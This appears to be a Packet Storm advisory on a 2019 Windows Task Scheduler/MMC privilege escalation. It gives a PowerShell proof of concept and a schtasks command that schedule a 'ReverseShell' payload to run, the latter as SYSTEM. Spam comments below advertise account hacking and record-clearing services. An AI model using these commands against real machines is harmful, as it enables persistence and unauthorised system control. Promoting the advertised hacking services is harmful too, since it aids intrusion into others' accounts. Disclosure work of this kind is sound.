what you don't know can hurt you

Microsoft Windows Task Scheduler Local Privilege Escalation

Microsoft Windows Task Scheduler Local Privilege Escalation
Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
MD5 | 8e6e723a39a4d2907bdf7a5b25c884e6

Microsoft Windows Task Scheduler Local Privilege Escalation

Change Mirror Download
Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.

Affected Platforms: -
Microsoft Windows ≤10

Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)

Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.

Summary: - The Typical Computer User Can Trigger Programs at Intervals on any Account existing on the Host System/Domain without Propper Authorization.

Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI, MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional EoP.

Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
: - Only the GUI seems to be affected, this is shown with our simple PowerShell script when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp' additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload, therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
: - Enterprise/Personal systems complying with basic security practices are less likely to be affected, the average computer user with default system configuration could be vulnerable to such attacks.

Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload, its up to you "the attacker" to create your own payload.
#NOTE: Task should run everyday at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions, this PoC only exists to prove modifying line 9, col 39 & line 3, col 28 to either "AtLogIn" or "AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*

VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**

Expected Result: -
Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.

Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.

Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.

NVD CVSS v3 Vector: -

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7

NVD CVSS v2 Vector: -

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8

MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8

TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.

Comments (3)

RSS Feed Subscribe to this comment feed

Do you need to increase your credit score?
Do you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : hackerkelvinmckinnon14489 AT GMAIL DOT COM

Comment by felishiagreen
2019-07-19 23:58:05 UTC | Permalink | Reply

I enjoyed reading your articles. This is truly a great read for me. <a href="www.tallahasseetowingpartners.com">click here</a>

Comment by joshuaprice153
2019-07-24 04:52:59 UTC | Permalink | Reply

This blog is very nice.I really like such a fantastic written blog.I will keep coming here again and again.Visit my link as well. www.tallahasseetowingpartners.com

Comment by joshuaprice153
2019-07-24 05:11:16 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    8 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By